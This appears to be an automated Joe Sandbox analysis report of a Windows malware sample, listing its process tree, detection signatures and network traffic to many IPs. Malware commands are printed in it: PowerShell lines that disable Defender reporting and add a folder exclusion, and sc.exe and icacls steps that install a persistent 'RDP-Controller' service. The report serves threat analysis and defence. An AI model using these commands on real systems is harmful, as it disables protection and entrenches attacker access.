Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1516963
MD5:54a1448df6e33d7032232dd1d896bc68
SHA1:8ed1df1c308956143e79adf5732e2d6204faf58a
SHA256:075d0dafd7b794fbabaf53d38895cfd7cffed4a3fe093b0fc7853f3b3ce642a4
Tags:exeuser-Bitsight
Infos:

Detection

Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for dropped file
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Connects to many ports of the same IP (likely port scanning)
Contains functionality to hide user accounts
Found Tor onion address
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
NDIS Filter Driver detected (likely used to intercept and sniff network traffic)
Sigma detected: Execution from Suspicious Folder
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious New Service Creation
Sigma detected: Suspicious Program Location with Network Connections
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Binary contains a suspicious time stamp
Connects to several IPs in different countries
Contains functionality to call native functions
Contains functionality to create new users
Contains functionality to dynamically determine API calls
Contains functionality to enumerate network shares
Contains functionality to enumerate running services
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query network adapater information
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain checking for process token information
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries keyboard layouts
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses cacls to modify the permissions of files
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes

Classification

  • System is w10x64
  • file.exe (PID: 6688 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 54A1448DF6E33D7032232DD1D896BC68)
  • file.exe (PID: 6728 cmdline: C:\Users\user\Desktop\file.exe MD5: 54A1448DF6E33D7032232DD1D896BC68)
    • cmd.exe (PID: 6928 cmdline: "C:\Windows\system32\cmd.exe" /k "C:\Users\user\AppData\Local\Temp\tskowkhh962esyo3x0.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6948 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7120 cmdline: powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 2308 cmdline: powershell.exe -NoLogo -Command "Set-MpPreference -MAPSReporting 0" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 2132 cmdline: powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • 3lp16vmh8u8y3z1y6.exe (PID: 5432 cmdline: "C:\Users\user\AppData\Local\Temp\3lp16vmh8u8y3z1y6.exe" MD5: 319865D78CC8DF6270E27521B8182BFF)
    • dx4w727xyq6q2yaxja.exe (PID: 3744 cmdline: "C:\Users\user\AppData\Local\Temp\dx4w727xyq6q2yaxja.exe" MD5: 7D1755E8E41A6C2F08D2FAEFFDF9DAD1)
      • taskkill.exe (PID: 5104 cmdline: taskkill.exe /F /FI "SERVICES eq RDP-Controller" MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • conhost.exe (PID: 4284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 2520 cmdline: sc.exe stop RDP-Controller MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 7140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 5024 cmdline: sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 2208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 5936 cmdline: sc.exe failure RDP-Controller reset= 1 actions= restart/10000 MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 3384 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 5828 cmdline: sc.exe start RDP-Controller MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 2476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • icacls.exe (PID: 2488 cmdline: icacls.exe C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\ /setowner *S-1-5-18 MD5: 48C87E3B3003A2413D6399EA77707F5D)
        • conhost.exe (PID: 2140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • icacls.exe (PID: 5356 cmdline: icacls.exe C:\Users\Public /restore C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\95cRhCj4pPDP.acl MD5: 48C87E3B3003A2413D6399EA77707F5D)
        • conhost.exe (PID: 4476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • main.exe (PID: 7108 cmdline: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe MD5: 4E320E2F46342D6D4657D2ADBF1F22D0)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe, CommandLine: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe, NewProcessName: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe, OriginalFileName: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe, ProcessId: 7108, ProcessName: main.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend", CommandLine: powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /k "C:\Users\user\AppData\Local\Temp\tskowkhh962esyo3x0.bat", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6928, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend", ProcessId: 7120, ProcessName: powershell.exe
Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore, CommandLine: sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore, CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\dx4w727xyq6q2yaxja.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\dx4w727xyq6q2yaxja.exe, ParentProcessId: 3744, ParentProcessName: dx4w727xyq6q2yaxja.exe, ProcessCommandLine: sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore, ProcessId: 5024, ProcessName: sc.exe
Source: Network ConnectionAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: DestinationIp: 85.239.52.241, DestinationIsIpv6: false, DestinationPort: 28764, EventID: 3, Image: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe, Initiated: true, ProcessId: 7108, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49745
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'", CommandLine: powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /k "C:\Users\user\AppData\Local\Temp\tskowkhh962esyo3x0.bat", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6928, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'", ProcessId: 2132, ProcessName: powershell.exe
Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore, CommandLine: sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore, CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\dx4w727xyq6q2yaxja.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\dx4w727xyq6q2yaxja.exe, ParentProcessId: 3744, ParentProcessName: dx4w727xyq6q2yaxja.exe, ProcessCommandLine: sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore, ProcessId: 5024, ProcessName: sc.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend", CommandLine: powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /k "C:\Users\user\AppData\Local\Temp\tskowkhh962esyo3x0.bat", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6928, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend", ProcessId: 7120, ProcessName: powershell.exe
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: C:\Users\user\AppData\Local\Temp\dx4w727xyq6q2yaxja.exeReversingLabs: Detection: 18%
Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
Source: C:\Users\user\AppData\Local\Temp\dx4w727xyq6q2yaxja.exeJoe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\dx4w727xyq6q2yaxja.exeFile created: C:\Users\user\AppData\Local\Temp\installer.logJump to behavior
Source: Binary string: RfxVmt.pdb source: dx4w727xyq6q2yaxja.exe, 0000000C.00000002.2031093025.00007FF6CEF8E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000017.00000002.2976455643.000001FC7B12E000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000003.1974223599.000001FC7A526000.00000004.00000020.00020000.00000000.sdmp, rfxvmt.dll.23.dr, HwfABz7s.23.dr
Source: Binary string: RfxVmt.pdbGCTL source: dx4w727xyq6q2yaxja.exe, 0000000C.00000002.2031093025.00007FF6CEF8E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000017.00000002.2976455643.000001FC7B12E000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000003.1974223599.000001FC7A526000.00000004.00000020.00020000.00000000.sdmp, rfxvmt.dll.23.dr, HwfABz7s.23.dr
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FFE0E136D5F NetApiBufferFree,NetUserEnum,GetProcessHeap,HeapAlloc,memcpy,GetProcessHeap,HeapFree,23_2_00007FFE0E136D5F
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FFE0E136DA3 LocalAlloc,wcsncpy,LookupAccountNameW,GetLastError,GetLastError,LocalAlloc,LookupAccountNameW,LocalFree,GetLastError,ConvertSidToStringSidA,GetLastError,wcslen,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,NetApiBufferFree,NetUserEnum,GetProcessHeap,HeapAlloc,memcpy,GetProcessHeap,HeapFree,23_2_00007FFE0E136DA3
Source: C:\Users\user\AppData\Local\Temp\3lp16vmh8u8y3z1y6.exeCode function: 5_2_00007FF73AFB3DB3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,5_2_00007FF73AFB3DB3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FF6EF6547A3 FindNextFileA,_mbscpy,FindFirstFileA,GetLastError,GetLastError,FindClose,23_2_00007FF6EF6547A3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FFE0E13A083 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,23_2_00007FFE0E13A083
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FFE0E161883 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,23_2_00007FFE0E161883
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FFE0EB45BF3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,23_2_00007FFE0EB45BF3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FFE11EC5203 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,23_2_00007FFE11EC5203
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FFE126D2FE3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,23_2_00007FFE126D2FE3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FFE133857B3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,23_2_00007FFE133857B3

Networking

barindex
Source: global trafficTCP traffic: 70.113.162.253 ports 1,2,4,14928,8,9
Source: global trafficTCP traffic: 85.239.52.241 ports 2,4,28764,6,7,8
Source: global trafficTCP traffic: 88.210.6.42 ports 25314,1,2,3,4,5
Source: global trafficTCP traffic: 141.98.234.85 ports 42069,0,2,4,6,9
Source: dx4w727xyq6q2yaxja.exe, 0000000C.00000002.2031093025.00007FF6CEF8E000.00000004.00000001.01000000.00000007.sdmpString found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/,https://reseed.stormycloud.org/
Source: main.exeString found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,ht
Source: main.exe, 00000017.00000002.2980573356.00007FFDFB7E4000.00000002.00000001.01000000.0000000C.sdmpString found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/,https://reseed.stormycloud.org/
Source: main.exe, 00000017.00000002.2976455643.000001FC7B12E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/,https://reseed.stormycloud.org/
Source: main.exe, 00000017.00000002.2977904707.000001FC7B55D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/,https://reseed.stormycloud.org/
Source: zCUeqzwC.23.drString found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/,https://reseed.stormycloud.org/
Source: 3lp16vmh8u8y3z1y6.exe.1.drStatic PE information: Found NDIS imports: FwpmEngineClose0, FwpmEngineOpen0, FwpmFilterAdd0, FwpmFilterDeleteByKey0, FwpmFreeMemory0, FwpmProviderAdd0, FwpmProviderCreateEnumHandle0, FwpmProviderDestroyEnumHandle0, FwpmProviderEnum0
Source: unknownNetwork traffic detected: IP country count 21
Source: global trafficTCP traffic: 192.168.2.4:49730 -> 64.95.13.143:1120
Source: global trafficTCP traffic: 192.168.2.4:49745 -> 85.239.52.241:28764
Source: global trafficTCP traffic: 192.168.2.4:49746 -> 101.191.73.121:18088
Source: global trafficTCP traffic: 192.168.2.4:49747 -> 85.230.189.73:29072
Source: global trafficTCP traffic: 192.168.2.4:49748 -> 70.113.162.253:14928
Source: global trafficTCP traffic: 192.168.2.4:49749 -> 194.207.132.221:17106
Source: global trafficTCP traffic: 192.168.2.4:49750 -> 24.70.217.209:15318
Source: global trafficTCP traffic: 192.168.2.4:49751 -> 74.222.100.29:9686
Source: global trafficTCP traffic: 192.168.2.4:49752 -> 89.89.209.95:62129
Source: global trafficTCP traffic: 192.168.2.4:49753 -> 188.174.130.9:11724
Source: global trafficTCP traffic: 192.168.2.4:49754 -> 141.98.234.85:42069
Source: global trafficTCP traffic: 192.168.2.4:49758 -> 184.65.173.183:11171
Source: global trafficTCP traffic: 192.168.2.4:49759 -> 88.210.6.42:25314
Source: global trafficTCP traffic: 192.168.2.4:49760 -> 207.178.119.175:29260
Source: global trafficUDP traffic: 192.168.2.4:17383 -> 213.145.125.139:21689
Source: global trafficUDP traffic: 192.168.2.4:17383 -> 188.89.23.222:19229
Source: global trafficUDP traffic: 192.168.2.4:17383 -> 66.228.49.30:23016
Source: global trafficUDP traffic: 192.168.2.4:17383 -> 185.128.245.162:25107
Source: global trafficUDP traffic: 192.168.2.4:17383 -> 24.231.176.11:22951
Source: global trafficUDP traffic: 192.168.2.4:17383 -> 107.189.6.31:23012
Source: global trafficUDP traffic: 192.168.2.4:17383 -> 2.177.52.177:14810
Source: global trafficUDP traffic: 192.168.2.4:17383 -> 45.76.244.95:22681
Source: global trafficUDP traffic: 192.168.2.4:17383 -> 161.65.240.191:18793
Source: global trafficUDP traffic: 192.168.2.4:17383 -> 47.250.187.161:27292
Source: global trafficUDP traffic: 192.168.2.4:17383 -> 99.234.18.44:23154
Source: global trafficUDP traffic: 192.168.2.4:17383 -> 212.118.52.164:26199
Source: global trafficUDP traffic: 192.168.2.4:17383 -> 5.104.75.170:12345
Source: global trafficUDP traffic: 192.168.2.4:17383 -> 81.183.201.129:9732
Source: global trafficUDP traffic: 192.168.2.4:17383 -> 2.135.133.55:12868
Source: global trafficUDP traffic: 192.168.2.4:17383 -> 198.37.222.72:25083
Source: global trafficUDP traffic: 192.168.2.4:17383 -> 85.239.63.250:26748
Source: global trafficUDP traffic: 192.168.2.4:17383 -> 92.95.33.134:38552
Source: global trafficUDP traffic: 192.168.2.4:17383 -> 31.13.134.204:25275
Source: global trafficUDP traffic: 192.168.2.4:17383 -> 78.47.80.55:12207
Source: global trafficUDP traffic: 192.168.2.4:17383 -> 135.181.40.188:13568
Source: global trafficUDP traffic: 192.168.2.4:17383 -> 99.252.228.84:23131
Source: global trafficUDP traffic: 192.168.2.4:17383 -> 5.19.249.240:19209
Source: global trafficUDP traffic: 192.168.2.4:17383 -> 85.239.53.47:28583
Source: global trafficUDP traffic: 192.168.2.4:17383 -> 24.51.216.45:27375
Source: global trafficUDP traffic: 192.168.2.4:17383 -> 139.162.110.14:22293
Source: global trafficUDP traffic: 192.168.2.4:17383 -> 66.78.40.49:20105
Source: global trafficUDP traffic: 192.168.2.4:17383 -> 217.10.112.72:10706
Source: global trafficUDP traffic: 192.168.2.4:17383 -> 86.106.93.104:14840
Source: global trafficUDP traffic: 192.168.2.4:17383 -> 106.68.22.241:26891
Source: global trafficUDP traffic: 192.168.2.4:17383 -> 108.227.133.164:21344
Source: global trafficUDP traffic: 192.168.2.4:17383 -> 190.22.24.78:33037
Source: global trafficUDP traffic: 192.168.2.4:17383 -> 176.109.240.152:23773
Source: global trafficUDP traffic: 192.168.2.4:17383 -> 68.1.55.11:26636
Source: global trafficUDP traffic: 192.168.2.4:17383 -> 89.219.212.160:15363
Source: global trafficUDP traffic: 192.168.2.4:17383 -> 86.46.70.248:15622
Source: global trafficUDP traffic: 192.168.2.4:17383 -> 188.187.151.89:26647
Source: global trafficUDP traffic: 192.168.2.4:17383 -> 68.65.178.44:23154
Source: global trafficUDP traffic: 192.168.2.4:17383 -> 46.51.90.183:12340
Source: global trafficUDP traffic: 192.168.2.4:17383 -> 85.6.171.9:19675
Source: global trafficUDP traffic: 192.168.2.4:17383 -> 88.156.92.211:37691
Source: global trafficUDP traffic: 192.168.2.4:17383 -> 73.246.172.43:21102
Source: global trafficUDP traffic: 192.168.2.4:17383 -> 154.61.58.162:23154
Source: Joe Sandbox ViewASN Name: TWC-11427-TEXASUS TWC-11427-TEXASUS
Source: unknownTCP traffic detected without corresponding DNS query: 64.95.13.143
Source: unknownTCP traffic detected without corresponding DNS query: 64.95.13.143
Source: unknownTCP traffic detected without corresponding DNS query: 64.95.13.143
Source: unknownTCP traffic detected without corresponding DNS query: 64.95.13.143
Source: unknownTCP traffic detected without corresponding DNS query: 64.95.13.143
Source: unknownTCP traffic detected without corresponding DNS query: 64.95.13.143
Source: unknownTCP traffic detected without corresponding DNS query: 64.95.13.143
Source: unknownTCP traffic detected without corresponding DNS query: 64.95.13.143
Source: unknownTCP traffic detected without corresponding DNS query: 64.95.13.143
Source: unknownTCP traffic detected without corresponding DNS query: 64.95.13.143
Source: unknownTCP traffic detected without corresponding DNS query: 64.95.13.143
Source: unknownTCP traffic detected without corresponding DNS query: 64.95.13.143
Source: unknownTCP traffic detected without corresponding DNS query: 64.95.13.143
Source: unknownTCP traffic detected without corresponding DNS query: 64.95.13.143
Source: unknownTCP traffic detected without corresponding DNS query: 64.95.13.143
Source: unknownTCP traffic detected without corresponding DNS query: 64.95.13.143
Source: unknownTCP traffic detected without corresponding DNS query: 64.95.13.143
Source: unknownTCP traffic detected without corresponding DNS query: 64.95.13.143
Source: unknownTCP traffic detected without corresponding DNS query: 64.95.13.143
Source: unknownTCP traffic detected without corresponding DNS query: 64.95.13.143
Source: unknownTCP traffic detected without corresponding DNS query: 64.95.13.143
Source: unknownTCP traffic detected without corresponding DNS query: 64.95.13.143
Source: unknownTCP traffic detected without corresponding DNS query: 64.95.13.143
Source: unknownTCP traffic detected without corresponding DNS query: 64.95.13.143
Source: unknownTCP traffic detected without corresponding DNS query: 64.95.13.143
Source: unknownTCP traffic detected without corresponding DNS query: 64.95.13.143
Source: unknownTCP traffic detected without corresponding DNS query: 64.95.13.143
Source: unknownTCP traffic detected without corresponding DNS query: 64.95.13.143
Source: unknownTCP traffic detected without corresponding DNS query: 64.95.13.143
Source: unknownTCP traffic detected without corresponding DNS query: 64.95.13.143
Source: unknownTCP traffic detected without corresponding DNS query: 64.95.13.143
Source: unknownTCP traffic detected without corresponding DNS query: 64.95.13.143
Source: unknownTCP traffic detected without corresponding DNS query: 64.95.13.143
Source: unknownTCP traffic detected without corresponding DNS query: 64.95.13.143
Source: unknownTCP traffic detected without corresponding DNS query: 64.95.13.143
Source: unknownTCP traffic detected without corresponding DNS query: 64.95.13.143
Source: unknownTCP traffic detected without corresponding DNS query: 64.95.13.143
Source: unknownTCP traffic detected without corresponding DNS query: 64.95.13.143
Source: unknownTCP traffic detected without corresponding DNS query: 64.95.13.143
Source: unknownTCP traffic detected without corresponding DNS query: 64.95.13.143
Source: unknownTCP traffic detected without corresponding DNS query: 64.95.13.143
Source: unknownTCP traffic detected without corresponding DNS query: 64.95.13.143
Source: unknownTCP traffic detected without corresponding DNS query: 64.95.13.143
Source: unknownTCP traffic detected without corresponding DNS query: 64.95.13.143
Source: unknownTCP traffic detected without corresponding DNS query: 64.95.13.143
Source: unknownTCP traffic detected without corresponding DNS query: 64.95.13.143
Source: unknownTCP traffic detected without corresponding DNS query: 64.95.13.143
Source: unknownTCP traffic detected without corresponding DNS query: 64.95.13.143
Source: unknownTCP traffic detected without corresponding DNS query: 64.95.13.143
Source: unknownTCP traffic detected without corresponding DNS query: 64.95.13.143
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FFE0E135EEA recv,WSAGetLastError,23_2_00007FFE0E135EEA
Source: dx4w727xyq6q2yaxja.exe, 0000000C.00000002.2031093025.00007FF6CEF8E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000017.00000002.2976455643.000001FC7B12E000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.23.dr, vjj4eCBz.23.drString found in binary or memory: http://127.0.0.1:8118
Source: dx4w727xyq6q2yaxja.exe, 0000000C.00000002.2031093025.00007FF6CEF8E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000017.00000002.2976455643.000001FC7B12E000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.23.dr, vjj4eCBz.23.drString found in binary or memory: http://identiguy.i2p/hosts.txt
Source: main.exe, 00000017.00000002.2976455643.000001FC7B12E000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000002.2978303418.000001FC7B9B2000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000002.2977904707.000001FC7B55D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000003.2531546601.000001FC7B9B2000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000003.2531876609.000001FC7B9B2000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.23.dr, vjj4eCBz.23.dr, zCUeqzwC.23.drString found in binary or memory: http://reg.i2p/hosts.txt
Source: main.exe, 00000017.00000002.2977904707.000001FC7B55D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://reg.i2p/hosts.txt/
